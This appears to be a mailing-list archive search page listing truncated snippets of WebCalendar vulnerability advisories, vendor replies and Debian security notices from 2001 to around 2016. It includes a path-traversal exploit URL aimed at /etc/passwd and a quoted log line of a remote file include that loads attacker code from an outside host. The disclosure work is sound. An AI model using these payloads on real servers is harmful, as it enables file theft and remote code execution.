Hi, Dan:
For some vulnerability has fixed by the vendor, I have update this
vulnerability advisory, sorry for any trouble I have caused to you.
The following is the updated advisory.:
===
WebCalendar CRLF Injection Vulnerability
I. BACKGROUND
=
Secure Reality Pty Ltd. Security Pre-Advisory #4 (SRPRE4)
http://www.securereality.com.au
=
[Title]
Remote command execution vulnerabilities in WebCalendar
[Released]
23/4/2001
This is a pre
Webcalendar 0.9.41 and below.
http://webcalendar.sourceforge.net/
Since this appears to be public info now.
Problem:
http://sourceforge.net/forum/forum.php?thread_id=901234&forum_id=11588
Exploit:
http://www.some.host/webcalendar/[filename].php?user_inc=../../../../../etc/pa
WebCalendar Multiple Vulnerabilities
Name Multiple Vulnerabilities in WebCalendar
Systems Affected WebCalendar (verified on 1.0.1)
Severity Medium Risk
Vendorwww.k5n.us/webcalendar.php?topic=About
Advisory
http://www.ush.it/2005/11/28/webcalendar
WebCalendar Multiple Vulnerabilities.
Author: lwang (lwang at lwang.org)
Publish Date: 2005-12-1
Description:
WebCalendar is a PHP application used to maintain a calendar for one or more
persons and for a variety of purposes.
In WebCalendar 0.1.0, activity_log.php and edit_report_handler.php
On Sun, Jul 20, 2003 at 08:20:15PM -0500, noconflic wrote:
>
>
> Webcalendar 0.9.41 and below.
> http://webcalendar.sourceforge.net/
>
> Since this appears to be public info now.
>
> Problem:
> http://sourceforge.net/forum/forum.php?thread_id=901234&forum_
Paul Laudanski wrote:
I too tried contacting the vendor but received no response. Your timing
of vendor notice and vul'n release are fast unfortunately. Taking a look,
simple functions in PHP can be called upon to fix those issues.
thanks Paul for the cooperation : )
i'm sorry i hadn't upda
Fix has already been posted:
https://sourceforge.net/tracker/index.php?func=detail&aid=1369439&group_id=3870&atid=303870
On Mon, 28 Nov 2005, ascii wrote:
> Name Multiple Vulnerabilities in WebCalendar
> Systems Affected WebCalendar (verified on 1.0.1)
> Severity Medium Risk
> Vendorwww.k5n.us/webcalendar.php?topic=About
> Advisory
>http://www.ush.
# Exploit Title: Webcalendar 1.2.4 'location' XSS
# Date: 01/11/12
# Author: G13
# Software Link:
https://sourceforge.net/projects/webcalendar/?source=directory
# Version: 1.2.5
# Category: webapps (php)
#
# Vulnerability #
There is no sanitation on the input of the locatio
WebCalendar is a PHP-based calendar application that can be configured
as a single-user calendar, a multi-user calendar for groups of users,
or as an event calendar viewable by visitors.
See project homepage for details: http://www.k5n.us/webcalendar.php
Description:
The problem is that
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-PHP-CODE-INJECTION.txt
[+] ISR: ApparitionSec
Vendor:
==
www.k5n.us/webcalendar.php
Product
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-CSRF-PROTECTION-BYPASS.txt
[+] ISR: ApparitionSec
Vendor:
==
www.k5n.us/webcalendar.php
Product
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-CSRF-PROTECTION-BYPASS.txt
[+] ISR: ApparitionSec
Vendor:
==
www.k5n.us/webcalendar.php
Product
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-CSRF-PROTECTION-BYPASS.txt
[+] ISR: ApparitionSec
Vendor:
==
www.k5n.us/webcalendar.php
Product
-
WebCalendar <= 1.2.4 Two Security Vulnerabilities
-
author..: Egidio Romano aka EgiX
mail: n0b0d13s[at]gmail[dot]com
software link...: https://sourceforge.net/proje
Vulnerability ID: HTB22930
Reference: http://www.htbridge.ch/advisory/xss_in_webcalendar.html
Product: WebCalendar
Vendor: k5n.us ( http://www.k5n.us/ )
Vulnerable Version: 1.2.3
Vendor Notification: 29 March 2011
Vulnerability Type: XSS (Cross Site Scripting)
Risk level: Medium
Credit: High
According to WebCalendar lead developer, this will be corrected in
upcoming developer release v1.1.
david
On 5/5/06, David Maciejak <[EMAIL PROTECTED]> wrote:
WebCalendar is a PHP-based calendar application that can be configured
as a single-user calendar, a multi-user calendar for gro
Version:WebCalendar-1.0.3
Type: Reading of any files
Description:
-
includes/config.php:
line 64
if ( ! empty ( $includedir ) )
$fd = @fopen ( "$includedir/settings.php", "rb", true );
..
while ( ! feof ( $fd ) ) {
WebCalendar >=1.0 Cross-Site Scripting Vulnerabilities
|=---=[ WebCalendar >=1.0 Cross-Site Scripting Vulnerabilities ]---=|
|=-=|
|=---=[ 7all<7all7_a
Full path disclosure in webcalendar
Author : Rusydi Hasan M
a.k.a: cR45H3R
Location : Indonesia, Cilacap
Date : March,28th 2006
Version : 1.1.0-CVS
--- (software description)
WebCalendar is a PHP application used to maintain a
calendar for one or more persons and for a variety of
This issue has been fixed in the SourceForge CVS repository (REL_1_0_0) and is
included in the 1.0.4 release (released on 7 Jun 2006).
After finding these entries in the logfile and finding a cmd.html-file in this
directory, I was disconnected because I was working as a phishing-site.
"POST
/WebCalendar/tools/send_reminders.php?includedir=http://65.xxx.xx.xxx/dir/a.txt?
HTTP/1.1" 200 7315
In other words, the at
Advisory: Multiple Cross-Site Scripting vulnerabilities in WebCalendar
Advisory ID:SSCHADV2011-008
Author: Stefan Schurtz
Affected Software: Version 1.2.3 and probably prior versions
Vendor URL: http://www.k5n.us/webcalendar.php
Vendor Status: informed
On Mon, Jul 04, 2011 at 06:46:09AM +, sschu...@t-online.de wrote:
> Advisory: Multiple Cross-Site Scripting vulnerabilities in
> WebCalendar
> Advisory ID:SSCHADV2011-008
> Author: Stefan Schurtz
> Affected Software: Version 1.2.3 and probably
|---|
|
|
| WebCalendar v0.9.45 (13 Dec 2004) (login.php) Remote File include
No response from vendor so far!
And no I didn't request a CVE-identifier, so I'd really appreciate your help :)
Best regards,
Stefan
http://www.debian.org/security/faq
- --
Package: webcalendar
Vulnerability : several
Problem type : remote
Debian-specific: no
CVE IDs: CVE-2005-3949 CVE-2005-3961 CVE-2005-3982
CERT advisory
This is an outdated version of WebCalendar (0.9.45). This issue and other
related issues are fixes in the 1.0.5 version of WebCalendar.
http://www.debian.org/security/faq
- --
Package: webcalendar
Vulnerability : verbose error message
Problem type : remote
Debian-specific: no
CVE ID : CVE-2006-2247
Debian Bug : 366927
David
http://www.debian.org/security/faq
- --
Package: webcalendar
Vulnerability : missing input sanitising
Problem-Type : remote
Debian-specific: no
CVE ID : CVE-2007-1343
It was discovered that
http://www.debian.org/security/faq
- --
Package: webcalendar
Vulnerability : missing input sanitising
Problem-Type : remote
Debian-specific: no
CVE ID : CVE-2006-6669
It was discovered that
http://www.debian.org/security/faq
- --
Package: webcalendar
Vulnerability : uninitialised variable
Problem type : remote
Debian-specific: no
CVE ID : CVE-2006-2762
A vulnerability has been
33 matches
Mail list logo
